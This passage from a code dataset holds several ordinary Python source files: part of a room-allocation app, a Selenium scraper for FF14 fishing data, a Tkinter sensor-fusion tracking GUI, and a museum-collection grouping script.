sqlite database using SQLAlchemy library.\"\"\"\n\n if database is None:\n database = \"default.db\"\n\n # Checks if db file exists.\n temp_office_array = []\n temp_living_array = []\n\n if not os.path.exists(database):\n cprint(\"There is no database named \" + database, \"red\")\n return \"No database\"\n\n database_name = \"sqlite:///\" + str(database)\n engine = create_engine(database_name)\n\n Session = sessionmaker(bind=engine)\n session = Session()\n\n # Retrieve rooms if they exist\n\n if session.query(Rooms):\n\n for db_room in session.query(Rooms):\n if db_room.type == \"office\":\n office = Office(db_room.name)\n temp_office_array.append(office)\n cprint(\" Office named \" + office.name + \" retrieved\",\n \"green\")\n elif db_room.type == \"living_space\":\n living_space = LivingSpace(db_room.name)\n temp_living_array.append(living_space)\n cprint(\" Living space name \" +\n living_space.name + \" retrieved\", \"green\")\n\n # Retrieve people if they exist and add them to rooms\n\n if session.query(People):\n\n for person in session.query(People):\n if person.role == \"fellow\":\n\n fellow = Fellow(person.name)\n fellow.office_name = person.office_name\n\n if not person.office_name == \"None\":\n add_to_room(\n fellow, person.office_name,\n temp_office_array)\n\n fellow.living_space_name = person.living_space_name\n if not person.living_space_name == \"None\":\n add_to_room(\n fellow, person.living_space_name,\n temp_living_array)\n\n elif person.role == \"staff\":\n staff = Staff(person.name)\n staff.office_name = person.office_name\n if not person.office_name == \"None\":\n add_to_room(\n staff, person.office_name,\n temp_office_array)\n\n cprint(\"\\n Successfully retrieved rooms and occupants\\n\",\n \"green\")\n\n # Check for room conflicts and add rooms based on user input.\n\n self.add_db_rooms(temp_office_array)\n self.add_db_rooms(temp_living_array)\n else:\n cprint(\" There are no rooms in database\", \"yellow\")\n\n # Retrieve unallocated persons if they exist\n\n if session.query(Unallocated):\n\n for person in session.query(Unallocated):\n if person.role == \"fellow\":\n fellow = Fellow(person.name)\n if person.room_type == \"office\":\n self.office_unallocated.append(fellow)\n elif person.room_type == \"living_space\":\n self.living_unallocated.append(fellow)\n if person.role == \"staff\":\n staff = Staff(person.name)\n if person.room_type == \"office\":\n self.office_unallocated.append(staff)\n\n cprint(\" Successfully retrieved unallocated persons\",\n \"green\")\n\n else:\n cprint(\" There are no unallocated people in database\",\n \"yellow\")\n\n def add_db_rooms(self, rooms_array):\n \"\"\"Checks for conflicts between db rooms and system rooms and requests user\n input to either keep system data or overwrite it with database data\"\"\"\n\n merged_array = self.offices + self.living_spaces\n room_to_replace = None\n\n # Checks if room exist\n\n for temp_room in rooms_array:\n room_conflict = False\n\n for room in merged_array:\n dbroom_name = temp_room.name\n if room.name == dbroom_name:\n room_conflict = True\n room_to_replace = room\n break\n\n # If room exists then gives option to keep or overwrite system data\n\n if room_conflict:\n cprint(\"\\n There is conflict. Room named \" +\n dbroom_name + \" exists in system\", \"red\")\n cprint(\" Which would you like to keep?\")\n response = get_input(\n \" Enter ['database'], ['system'] or ['skip'] >> \")\n\n if str(response) == \"database\":\n cprint(\"\\n Overwriting system data with database\\n\",\n \"green\")\n\n if room.type == \"office\":\n self.offices.append(temp_room)\n self.offices.remove(room_to_replace)\n elif room.type == \"living_space\":\n self.living_spaces.append(temp_room)\n self.living_spaces.remove(room_to_replace)\n\n elif str(response) == \"system\":\n cprint(\"\\n Keeping system data\\n\", \"green\")\n\n elif str(response) == \"skip\":\n cprint(\"\\n Keeping default system data\", \"green\")\n return \"Skip\"\n\n else:\n cprint(\" Option: \" + response + \" is not known. \\\n Please type:\\n 'database', 'system' or 'skip'\", \"red\")\n self.add_db_rooms(rooms_array)\n\n else:\n if temp_room.type == \"office\":\n self.offices.append(temp_room)\n elif temp_room.type == \"living_space\":\n self.living_spaces.append(temp_room)\n\n def delete_object(self, del_object, identifier, selector=\"all\"):\n \"\"\"Deletes either room or person. Room's identifier is room name while\n person identifier is his id_key. selector gives options to delete from\n the office, living_space or unallocated, or all\"\"\"\n\n merged_array = self.offices + self.living_spaces\n\n if del_object == \"room\":\n\n for room in merged_array:\n if room.name == identifier:\n if room.type == \"office\":\n self.offices.remove(room)\n cprint(\"Office \" + room.name + \" has been \" +\n \" deleted.\", \"green\")\n return \"Success\"\n elif room.type == \"living_space\":\n self.living_spaces.remove(room)\n cprint(\"Room named \" + room.name +\n \" has been deleted from \" + room.type +\n \"s\", \"green\")\n return \"Success\"\n\n elif del_object == \"person\":\n\n if not is_int(identifier):\n cprint(\" To delete a person identifier needs to be an\" +\n \" integer\", \"red\")\n return \"Not integer\"\n\n if selector == \"office\":\n delete_from_room(self.offices, identifier)\n elif selector == \"living_space\":\n delete_from_room(self.living_spaces, identifier)\n elif selector == \"unallocated\":\n self.delete_from_unallocated(\n self.office_unallocated, identifier)\n self.delete_from_unallocated(\n self.living_unallocated, identifier)\n elif selector == \"all\":\n delete_from_room(self.offices, identifier)\n delete_from_room(self.living_spaces, identifier)\n delete_from_unallocated(\n self.office_unallocated, identifier)\n delete_from_unallocated(\n self.living_unallocated, identifier)\n\n else:\n cprint(\"Command not supported, you can only delete 'person'\" +\n \" and 'room'\", \"red\")\n return \"Wrong object\"\n","repo_name":"domiebett/dojo","sub_path":"modules/dojo.py","file_name":"dojo.py","file_ext":"py","file_size_in_byte":23233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36389104935","text":"#! /usr/bin/env python3\n\nimport asyncio\nimport urllib.parse\n\nimport lxml # type: ignore\n\nfrom bs4 import BeautifulSoup # type: ignore\nfrom selenium.common.exceptions import TimeoutException # type: ignore\nfrom selenium.webdriver.chrome.webdriver import WebDriver # type: ignore\nfrom selenium.webdriver.common.by import By # type: ignore\nfrom selenium.webdriver.support.ui import WebDriverWait # type: ignore\nfrom selenium.webdriver.support import expected_conditions # type: ignore\n\nfrom ff14angler.constants.values import (\n ANGLER_BASE_URL,\n ANGLER_PAGE_LOAD_WAIT_DURATION,\n ANGLER_DELAY_BETWEEN_REQUESTS_DURATION\n)\nfrom ff14angler.dataClasses.comment.commentSection import CommentSection\nfrom ff14angler.dataClasses.fish.fish import Fish\nfrom ff14angler.dataClasses.fish.fishProvider import FishProvider\nfrom ff14angler.exceptions.networkException import NetworkException\nfrom ff14angler.scraper.lodestoneImageScraper import LodestoneImageScraper\nfrom ff14angler.network.delayOnReleaseLock import DelayOnReleaseLock\n\n\nclass FishScraper:\n\n @staticmethod\n async def update_fish_with_large_icon_url(driver: WebDriver, fish: Fish):\n if fish.fish_angler_lodestone_url:\n if fish.fish_icon_url is None:\n raise ValueError(f'Missing icon url from xivapi: {fish}')\n\n fish.fish_large_icon_url = await LodestoneImageScraper.get_large_icon(\n driver=driver,\n short_icon_url=fish.fish_icon_url,\n lodestone_url=fish.fish_angler_lodestone_url\n )\n\n @staticmethod\n async def update_fish_desynthesis_items_with_large_icon_url(driver: WebDriver, fish: Fish):\n for desynthesis_item in fish.fish_angler_desynthesis_items:\n if desynthesis_item.desynthesis_angler_lodestone_url:\n if desynthesis_item.desynthesis_icon_url is None:\n raise ValueError(f'Missing icon url from xivapi: {desynthesis_item}')\n\n desynthesis_item.desynthesis_large_icon_url = await LodestoneImageScraper.get_large_icon(\n driver=driver,\n short_icon_url=desynthesis_item.desynthesis_icon_url,\n lodestone_url=desynthesis_item.desynthesis_angler_lodestone_url\n )\n\n @staticmethod\n async def update_fish_involved_recipes_with_large_icon_url(driver: WebDriver, fish: Fish):\n for recipe in fish.fish_angler_involved_recipes:\n if recipe.recipe_angler_lodestone_url:\n if recipe.recipe_icon_url is None:\n raise ValueError(f'Missing icon url from xivapi: {recipe}')\n\n recipe.recipe_large_icon_url = await LodestoneImageScraper.get_large_icon(\n driver=driver,\n short_icon_url=recipe.recipe_icon_url,\n lodestone_url=recipe.recipe_angler_lodestone_url\n )\n\n @classmethod\n async def collect_fish_data(cls, driver: WebDriver):\n fish_url_template = urllib.parse.urljoin(ANGLER_BASE_URL, '/fish/')\n lock = DelayOnReleaseLock(ANGLER_DELAY_BETWEEN_REQUESTS_DURATION)\n\n for fish_id, fish in FishProvider.fish_holder.items():\n angler_url: str = urllib.parse.urljoin(fish_url_template, str(fish_id))\n for attempt in range(3):\n driver.get('about:blank')\n print(f'Scraping page: {angler_url}')\n driver.get(angler_url)\n\n try:\n WebDriverWait(driver, ANGLER_PAGE_LOAD_WAIT_DURATION).until(\n expected_conditions.presence_of_element_located(\n (By.CSS_SELECTOR, 'form.comment_form')\n )\n )\n\n async with lock:\n await asyncio.sleep(2)\n html: str = driver.page_source\n\n await fish.update_fish_with_comment_section(\n await CommentSection.get_comment_section_from_web_driver(driver)\n )\n break\n except (NetworkException, TimeoutException, ValueError,):\n if attempt == 2:\n raise\n\n await fish.update_fish_with_fish_soup(BeautifulSoup(html, lxml.__name__))\n await cls.update_fish_with_large_icon_url(driver, fish)\n await cls.update_fish_desynthesis_items_with_large_icon_url(driver, fish)\n await cls.update_fish_involved_recipes_with_large_icon_url(driver, fish)\n","repo_name":"joshua-software-dev/FF14AnglerParser","sub_path":"ff14angler/scraper/fishScraper.py","file_name":"fishScraper.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19927324511","text":"import lib.env as env_\nimport lib.utl as utl_\nimport lib.gui as gui_\nimport tkinter as tk\n\n# ----------------------------\n\nSENSOR_ARRAY = {'2D': ({'name': 's.1', 'noise': ( 2, 2), 'bias': ( 0, 0), 'interval': 500},\n {'name': 's.2', 'noise': ( 3, 3), 'bias': ( 0, 0), 'interval': 600},\n {'name': 's.3', 'noise': ( 5, 5), 'bias': ( 0, 0), 'interval': 700},\n {'name': 's.4', 'noise': ( 2, 2), 'bias': ( 0, 0), 'interval': 900},\n {'name': 's.5', 'noise': ( 5, 5), 'bias': (+20,+20), 'interval': 250},\n {'name': 's.6', 'noise': ( 8, 8), 'bias': (-20,-20), 'interval': 300}),\n \n '3D': ({'name': 's.1', 'noise': ( 2, 2, 2), 'bias': ( 0, 0, 0), 'interval': 500},\n {'name': 's.2', 'noise': ( 3, 3, 3), 'bias': ( 0, 0, 0), 'interval': 600},\n {'name': 's.3', 'noise': ( 5, 5, 5), 'bias': ( 0, 0, 0), 'interval': 700},\n {'name': 's.4', 'noise': ( 2, 2, 2), 'bias': ( 0, 0, 0), 'interval': 900},\n {'name': 's.5', 'noise': ( 5, 5, 5), 'bias': (+20,+20,+20), 'interval': 250},\n {'name': 's.6', 'noise': ( 8, 8, 8), 'bias': (-20,-20,-20), 'interval': 300})}\n\n# ----------------------------\n \nif __name__ == '__main__':\n\n root = gui_.init()\n app = gui_.AppFrame(root, 'virtual testbed: sensor fusion and multi-sensor tracking using standard motion models and recursive Bayesian filters', (1250, 800), '')\n main = gui_.TabFrame(app, tk.TOP)\n\n # ----------------------------\n\n tab_T2 = gui_.TabFrame(main, tk.TOP)\n main.add('2D', tab_T2)\n\n # ----------------------------\n\n tab_DF = gui_.TabFrame(tab_T2, tk.LEFT)\n tab_T2.add('Fusion', tab_DF)\n\n # ----------------------------\n\n tab_DF_KF = gui_.TabFrame(tab_DF, tk.TOP)\n tab_DF.add('KF', tab_DF_KF)\n\n tab_DF_KF_CV = gui_.FilterFrame(tab_DF_KF, 1, SENSOR_ARRAY['2D'], env_.CV, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DF_KF.add('CV', tab_DF_KF_CV)\n\n tab_DF_KF_CTL = gui_.FilterFrame(tab_DF_KF, 1, SENSOR_ARRAY['2D'], env_.CT, {'noise': 50, 'dt_millis': 40, 'angle': -60}, env_.EKF, {})\n tab_DF_KF.add('CT/L60', tab_DF_KF_CTL)\n\n tab_DF_KF_CTR = gui_.FilterFrame(tab_DF_KF, 1, SENSOR_ARRAY['2D'], env_.CT, {'noise': 50, 'dt_millis': 40, 'angle': +30}, env_.EKF, {})\n tab_DF_KF.add('CT/R30', tab_DF_KF_CTR)\n\n tab_DF_KF_CA = gui_.FilterFrame(tab_DF_KF, 1, SENSOR_ARRAY['2D'], env_.CA, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DF_KF.add('CA', tab_DF_KF_CA)\n\n tab_DF_KF_CJ = gui_.FilterFrame(tab_DF_KF, 1, SENSOR_ARRAY['2D'], env_.CJ, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DF_KF.add('CJ', tab_DF_KF_CJ)\n\n tab_DF_KF_BM = gui_.FilterFrame(tab_DF_KF, 1, SENSOR_ARRAY['2D'], env_.BM, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DF_KF.add('Brownian', tab_DF_KF_BM)\n\n # ----------------------------\n\n tab_DF_EKF = gui_.TabFrame(tab_DF, tk.TOP)\n tab_DF.add('EKF', tab_DF_EKF)\n\n tab_DF_EKF_CTRVp = gui_.FilterFrame(tab_DF_EKF, 1, SENSOR_ARRAY['2D'], env_.CTRV, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DF_EKF.add('CTRV', tab_DF_EKF_CTRVp)\n\n tab_DF_EKF_CTRAp = gui_.FilterFrame(tab_DF_EKF, 1, SENSOR_ARRAY['2D'], env_.CTRA, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DF_EKF.add('CTRA', tab_DF_EKF_CTRAp)\n\n tab_DF_UKF = gui_.TabFrame(tab_DF, tk.TOP)\n tab_DF.add('UKF', tab_DF_UKF)\n\n tab_DF_UKF_CTRVp = gui_.FilterFrame(tab_DF_UKF, 1, SENSOR_ARRAY['2D'], env_.CTRV, {'noise': 50, 'dt_millis': 40}, env_.UKF, {})\n tab_DF_UKF.add('CTRV', tab_DF_UKF_CTRVp)\n\n tab_DF_UKF_CTRAp = gui_.FilterFrame(tab_DF_UKF, 1, SENSOR_ARRAY['2D'], env_.CTRA, {'noise': 50, 'dt_millis': 40}, env_.UKF, {})\n tab_DF_UKF.add('CTRA', tab_DF_UKF_CTRAp)\n\n # ----------------------------\n\n tab_DA = gui_.TabFrame(tab_T2, tk.LEFT)\n tab_T2.add('Association', tab_DA)\n\n # ----------------------------\n\n tab_DA_KF = gui_.TabFrame(tab_DA, tk.TOP)\n tab_DA.add('KF', tab_DA_KF)\n\n tab_DA_KF_CV = gui_.FilterFrame(tab_DA_KF, 2, SENSOR_ARRAY['2D'], env_.CV, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DA_KF.add('CV', tab_DA_KF_CV)\n\n tab_DA_KF_CTL = gui_.FilterFrame(tab_DA_KF, 2, SENSOR_ARRAY['2D'], env_.CT, {'noise': 50, 'dt_millis': 40, 'angle': -60}, env_.EKF, {})\n tab_DA_KF.add('CT/L60', tab_DA_KF_CTL)\n\n tab_DA_KF_CTR = gui_.FilterFrame(tab_DA_KF, 2, SENSOR_ARRAY['2D'], env_.CT, {'noise': 50, 'dt_millis': 40, 'angle': +30}, env_.EKF, {})\n tab_DA_KF.add('CT/R30', tab_DA_KF_CTR)\n\n tab_DA_KF_CA = gui_.FilterFrame(tab_DA_KF, 2, SENSOR_ARRAY['2D'], env_.CA, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DA_KF.add('CA', tab_DA_KF_CA)\n\n tab_DA_KF_CJ = gui_.FilterFrame(tab_DA_KF, 2, SENSOR_ARRAY['2D'], env_.CJ, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DA_KF.add('CJ', tab_DA_KF_CJ)\n\n tab_DA_KF_BM = gui_.FilterFrame(tab_DA_KF, 2, SENSOR_ARRAY['2D'], env_.BM, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DA_KF.add('Brownian', tab_DA_KF_BM)\n\n # ----------------------------\n\n tab_DA_EKF = gui_.TabFrame(tab_DA, tk.TOP)\n tab_DA.add('EKF', tab_DA_EKF)\n\n tab_DA_EKF_CTRVp = gui_.FilterFrame(tab_DA_EKF, 2, SENSOR_ARRAY['2D'], env_.CTRV, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DA_EKF.add('CTRV', tab_DA_EKF_CTRVp)\n\n tab_DA_EKF_CTRAp = gui_.FilterFrame(tab_DA_EKF, 2, SENSOR_ARRAY['2D'], env_.CTRA, {'noise': 50, 'dt_millis': 40}, env_.EKF, {})\n tab_DA_EKF.add('CTRA', tab_DA_EKF_CTRAp)\n\n tab_DA_UKF = gui_.TabFrame(tab_DA, tk.TOP)\n tab_DA.add('UKF', tab_DA_UKF)\n\n tab_DA_UKF_CTRVp = gui_.FilterFrame(tab_DA_UKF, 2, SENSOR_ARRAY['2D'], env_.CTRV, {'noise': 50, 'dt_millis': 40}, env_.UKF, {})\n tab_DA_UKF.add('CTRV', tab_DA_UKF_CTRVp)\n\n tab_DA_UKF_CTRAp = gui_.FilterFrame(tab_DA_UKF, 2, SENSOR_ARRAY['2D'], env_.CTRA, {'noise': 50, 'dt_millis': 40}, env_.UKF, {})\n tab_DA_UKF.add('CTRA', tab_DA_UKF_CTRAp)\n\n # ----------------------------\n\n tab_T3 = gui_.TabFrame(main, tk.TOP)\n main.add('3D', tab_T3)\n\n # ----------------------------\n\n tab_DF3 = gui_.TabFrame(tab_T3, tk.TOP)\n tab_T3.add('Fusion', tab_DF3)\n\n # ----------------------------\n\n tab_DF3_CV = gui_.FilterFrame(tab_DF3, 1, SENSOR_ARRAY['3D'], env_.CV, {'dimension': 3, 'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DF3.add('CV (6-state)', tab_DF3_CV)\n\n tab_DF3_V = gui_.FilterFrame(tab_DF3, 1, SENSOR_ARRAY['3D'], env_.CYRPRV, {'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DF3.add('CYRPRV (8-state)', tab_DF3_V)\n\n tab_DF3_CA = gui_.FilterFrame(tab_DF3, 1, SENSOR_ARRAY['3D'], env_.CA, {'dimension': 3, 'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DF3.add('CA (9-state)', tab_DF3_CA)\n\n tab_DF3_A = gui_.FilterFrame(tab_DF3, 1, SENSOR_ARRAY['3D'], env_.CYRPRA, {'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DF3.add('CYRPRA (9-state)', tab_DF3_A)\n\n tab_DF3_CJ = gui_.FilterFrame(tab_DF3, 1, SENSOR_ARRAY['3D'], env_.CJ, {'dimension': 3, 'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DF3.add('CJ (12-state)', tab_DF3_CJ)\n\n # ----------------------------\n\n tab_DA3 = gui_.TabFrame(tab_T3, tk.TOP)\n tab_T3.add('Association', tab_DA3)\n\n # ----------------------------\n\n tab_DA3_CV = gui_.FilterFrame(tab_DA3, 2, SENSOR_ARRAY['3D'], env_.CV, {'dimension': 3, 'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DA3.add('CV (6-state)', tab_DA3_CV)\n\n tab_DA3_V = gui_.FilterFrame(tab_DA3, 2, SENSOR_ARRAY['3D'], env_.CYRPRV, {'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DA3.add('CYRPRV (8-state)', tab_DA3_V)\n\n tab_DA3_CA = gui_.FilterFrame(tab_DA3, 2, SENSOR_ARRAY['3D'], env_.CA, {'dimension': 3, 'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DA3.add('CA (9-state)', tab_DA3_CA)\n\n tab_DA3_A = gui_.FilterFrame(tab_DA3, 2, SENSOR_ARRAY['3D'], env_.CYRPRA, {'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DA3.add('CYRPRA (9-state)', tab_DA3_A)\n\n tab_DA3_CJ = gui_.FilterFrame(tab_DA3, 2, SENSOR_ARRAY['3D'], env_.CJ, {'dimension': 3, 'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DA3.add('CJ (12-state)', tab_DA3_CJ)\n\n # ----------------------------\n\n tk.mainloop()\n","repo_name":"m6c7l/mouse-tracking","sub_path":"sources/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8344,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"12457888468","text":"import asyncio\nimport math\nfrom collections import Counter\n\nimport click\nimport inflection\nfrom numpy import array\nfrom scipy.spatial.distance import cosine\nfrom sqlalchemy import and_, func, or_\nfrom sqlalchemy.future import select\nfrom sqlalchemy.orm import selectinload\n\nfrom museum_map.cli.items import apply_aat, apply_nlp\nfrom museum_map.cli.util import ClickIndeterminate\nfrom museum_map.models import Group, Item, create_sessionmaker\n\n\nasync def generate_groups_impl(config):\n \"\"\"Generate the basic groups.\"\"\"\n async with create_sessionmaker(config)() as dbsession:\n item_stmt = select(Item).filter(Item.group_id is None)\n count_stmt = select(func.count(Item.id)).filter(Item.group_id is None)\n count = await dbsession.execute(count_stmt)\n result = await dbsession.execute(item_stmt)\n categories = []\n with click.progressbar(\n result.scalars(), length=count.scalar_one(), label=\"Generating potential groups\"\n ) as progress:\n for item in progress:\n for category in item.attributes[\"_categories\"]:\n categories.append(category.lower())\n counts = [(cat, count) for cat, count in Counter(categories).most_common() if count >= 15] # noqa: PLR2004\n counts.sort(key=lambda c: c[1])\n max_groups = len(counts)\n with click.progressbar(length=max_groups, label=\"Generating groups\") as progress:\n while counts:\n category = counts[0][0]\n group_stmt = select(Group).filter(Group.value == category)\n result = await dbsession.execute(group_stmt)\n group = result.scalars().first()\n if group is None:\n group = Group(value=category, label=category[0].upper() + category[1:], split=\"basic\")\n dbsession.add(group)\n result = await dbsession.execute(item_stmt)\n for item in result.scalars():\n if category in item.attributes[\"_categories\"]:\n item.group = group\n await dbsession.commit()\n categories = []\n result = await dbsession.execute(item_stmt)\n for item in result.scalars():\n for category in item.attributes[\"_categories\"]:\n categories.append(category.lower())\n old_counts = len(counts)\n counts = [\n (cat, count) for cat, count in Counter(categories).most_common() if count >= 15 # noqa: PLR2004\n ]\n counts.sort(key=lambda c: c[1])\n progress.update(old_counts - len(counts))\n await dbsession.commit()\n\n\n@click.command()\n@click.pass_context\ndef generate_groups(ctx):\n \"\"\"Generate the basic groups.\"\"\"\n asyncio.run(generate_groups_impl(ctx.obj[\"config\"]))\n\n\ndef fill_vector(group):\n \"\"\"Create a full vector from a sparse vector in the database.\"\"\"\n vec = array([0 for _ in range(0, 300)], dtype=float)\n for dim, value in group.attributes[\"lda_vector\"]:\n vec[dim] = value\n return vec\n\n\ndef split_by_similarity(dbsession, group):\n \"\"\"Split the groups by similarity.\"\"\"\n vectors = {}\n sorted_items = []\n current = group.items[0]\n vectors[current.id] = fill_vector(current)\n while len(sorted_items) < len(group.items):\n next_item = None\n next_sim = None\n for item in group.items:\n if item in sorted_items:\n continue\n if item.id not in vectors:\n vectors[item.id] = fill_vector(item)\n if not next_item or cosine(vectors[current.id], vectors[item.id]) > next_sim:\n next_item = item\n next_sim = cosine(vectors[current.id], vectors[item.id])\n if next_item:\n sorted_items.append(next_item)\n limit = len(group.items) / math.ceil(len(group.items) / 100)\n new_group = Group(value=group.value, label=group.label, parent=group, split=\"similar\")\n dbsession.add(new_group)\n count = 0\n for item in sorted_items:\n if count > limit:\n new_group = Group(value=group.value, label=group.label, parent=group, split=\"similar\")\n dbsession.add(new_group)\n count = 0\n item.group = new_group\n count = count + 1\n\n\ndef split_by_attribute(dbsession, group, attr):\n \"\"\"Split the group by the values of a given attribute.\"\"\"\n values = []\n for item in group.items:\n if attr in item.attributes and item.attributes[attr]:\n values.extend(item.attributes[attr])\n categories = [\n (v, c) for v, c in Counter(values).most_common() if c < len(group.items) * 0.6666 and c >= 15 # noqa: PLR2004\n ]\n if categories:\n category_values = [v for v, _ in categories]\n has_values = 0\n for item in group.items:\n found = False\n for value in item.attributes[attr]:\n if value in category_values:\n found = True\n break\n if found:\n has_values = has_values + 1\n if has_values / len(group.items) > 0.9: # noqa: PLR2004\n categories.reverse()\n for category in categories:\n new_group = Group(\n value=category[0], label=f\"{group.label} - {category[0]}\", parent=group, split=\"attribute\"\n )\n dbsession.add(new_group)\n for item in list(group.items):\n if category[0] in item.attributes[attr]:\n item.group = new_group\n new_group = Group(value=group.label, label=group.label, parent=group, split=\"attribute\")\n dbsession.add(new_group)\n for item in list(group.items):\n item.group = new_group\n return True\n return False\n\n\ndef split_by_year(config, dbsession, group):\n \"\"\"Split the group by year.\"\"\"\n years = []\n decades = []\n centuries = []\n with_year = 0\n for item in group.items:\n if config[\"data\"][\"year_field\"] in item.attributes and item.attributes[config[\"data\"][\"year_field\"]]:\n years.append(item.attributes[config[\"data\"][\"year_field\"]])\n with_year = with_year + 1\n if with_year / len(group.items) > 0.95: # noqa: PLR2004\n common = [(int(v), c) for v, c in Counter(years).most_common()]\n start_year = min([c for c, _ in common])\n end_year = max([c for c, _ in common])\n if start_year != end_year:\n if (end_year - start_year) <= 100 and (end_year - start_year) > 10: # noqa: PLR2004\n start_decade = math.floor(start_year / 10)\n end_decade = math.floor(end_year / 10)\n decades = []\n for start_year in range(start_decade * 10, (end_decade + 1) * 10, 10):\n for item in list(group.items):\n if (\n config[\"data\"][\"year_field\"] in item.attributes\n and item.attributes[config[\"data\"][\"year_field\"]]\n ):\n if (\n start_year <= int(item.attributes[config[\"data\"][\"year_field\"]])\n and int(item.attributes[config[\"data\"][\"year_field\"]]) < start_year + 10\n ):\n if len(decades) == 0 or decades[-1][0][0] != start_year:\n decades.append([[start_year], 1])\n else:\n decades[-1][1] = decades[-1][1] + 1\n idx = 0\n while idx < len(decades) - 1:\n if decades[idx][1] + decades[idx + 1][1] < 100: # noqa: PLR2004\n decades[idx][0].extend(decades[idx + 1][0])\n decades[idx][1] = decades[idx][1] + decades[idx + 1][1]\n decades.pop(idx + 1)\n else:\n idx = idx + 1\n for years, _ in decades:\n new_group = None\n for item in list(group.items):\n if (\n config[\"data\"][\"year_field\"] in item.attributes\n and item.attributes[config[\"data\"][\"year_field\"]]\n ):\n if (\n years[0] <= int(item.attributes[config[\"data\"][\"year_field\"]])\n and int(item.attributes[config[\"data\"][\"year_field\"]]) < years[-1] + 10\n ):\n if new_group is None:\n if len(years) == 1:\n label = f\"{years[0]}s\"\n else:\n label = f\"{years[0]}s-{years[-1]}s\"\n new_group = Group(\n value=str(start_year),\n label=f\"{group.label} - {label}\",\n parent=group,\n split=\"time\",\n )\n dbsession.add(new_group)\n item.group = new_group\n if group.items:\n new_group = Group(value=group.label, label=group.label, parent=group, split=\"time\")\n dbsession.add(new_group)\n for item in list(group.items):\n item.group = new_group\n return True\n elif (end_year - start_year) > 100: # noqa: PLR2004\n start_century = math.floor(start_year / 100)\n end_century = math.floor(end_year / 100)\n centuries = []\n for start_year in range(start_century * 100, (end_century + 1) * 100, 100):\n for item in list(group.items):\n if (\n config[\"data\"][\"year_field\"] in item.attributes\n and item.attributes[config[\"data\"][\"year_field\"]]\n ):\n if (\n start_year <= int(item.attributes[config[\"data\"][\"year_field\"]])\n and int(item.attributes[config[\"data\"][\"year_field\"]]) < start_year + 100\n ):\n if len(centuries) == 0 or centuries[-1][0][0] != start_year:\n centuries.append([[start_year], 1])\n else:\n centuries[-1][1] = centuries[-1][1] + 1\n idx = 0\n while idx < len(centuries) - 1:\n if centuries[idx][1] + centuries[idx + 1][1] < 100: # noqa: PLR2004\n centuries[idx][0].extend(centuries[idx + 1][0])\n centuries[idx][1] = centuries[idx][1] + centuries[idx + 1][1]\n centuries.pop(idx + 1)\n else:\n idx = idx + 1\n for years, _ in centuries:\n new_group = None\n for item in list(group.items):\n if (\n config[\"data\"][\"year_field\"] in item.attributes\n and item.attributes[config[\"data\"][\"year_field\"]]\n ):\n if (\n years[0] <= int(item.attributes[config[\"data\"][\"year_field\"]])\n and int(item.attributes[config[\"data\"][\"year_field\"]]) < years[-1] + 100\n ):\n if new_group is None:\n if len(years) == 1:\n century = math.floor(years[0] / 100) + 1\n if century % 10 == 1 and century != 11: # noqa: PLR2004\n label = f\"{century}st\"\n elif century % 10 == 2 and century != 12: # noqa: PLR2004\n label = f\"{century}nd\"\n elif century % 10 == 3 and century != 13: # noqa: PLR2004\n label = f\"{century}rd\"\n else:\n label = f\"{century}th\"\n else:\n century = math.floor(years[0] / 100) + 1\n if century % 10 == 1 and century != 11: # noqa: PLR2004\n start_label = f\"{century}st\"\n elif century % 10 == 2 and century != 12: # noqa: PLR2004\n start_label = f\"{century}nd\"\n elif century % 10 == 3 and century != 13: # noqa: PLR2004\n start_label = f\"{century}rd\"\n else:\n start_label = f\"{century}th\"\n century = math.floor(years[-1] / 100) + 1\n if century % 10 == 1 and century != 11: # noqa: PLR2004\n end_label = f\"{century}st\"\n elif century % 10 == 2 and century != 12: # noqa: PLR2004\n end_label = f\"{century}nd\"\n elif century % 10 == 3 and century != 13: # noqa: PLR2004\n end_label = f\"{century}rd\"\n else:\n end_label = f\"{century}th\"\n label = f\"{start_label}-{end_label}\"\n new_group = Group(\n value=str(start_year),\n label=f\"{group.label} - {label} century\",\n parent=group,\n split=\"time\",\n )\n dbsession.add(new_group)\n item.group = new_group\n if group.items:\n new_group = Group(value=group.label, label=group.label, parent=group, split=\"time\")\n dbsession.add(new_group)\n for item in list(group.items):\n item.group = new_group\n return True\n return False\n\n\nasync def split_large_groups_impl(config):\n \"\"\"Split large groups into smaller ones.\"\"\"\n async with create_sessionmaker(config)() as dbsession:\n progress = ClickIndeterminate(\"Splitting large groups\")\n progress.start()\n splitting = True\n stmt = select(Group).options(selectinload(Group.items), selectinload(Group.children))\n while splitting:\n splitting = False\n result = await dbsession.execute(stmt)\n for group in result.scalars():\n if len(group.children) == 0:\n if len(group.items) > 120 and len(group.items) < 300: # noqa: PLR2004\n if split_by_year(config, dbsession, group):\n splitting = True\n else:\n split_by_similarity(dbsession, group)\n splitting = True\n elif len(group.items) >= 300: # noqa: PLR2004\n if split_by_attribute(dbsession, group, 